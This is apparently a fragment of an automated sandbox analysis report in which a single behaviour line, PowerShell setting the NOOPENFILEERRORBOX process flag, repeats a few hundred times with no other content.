                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
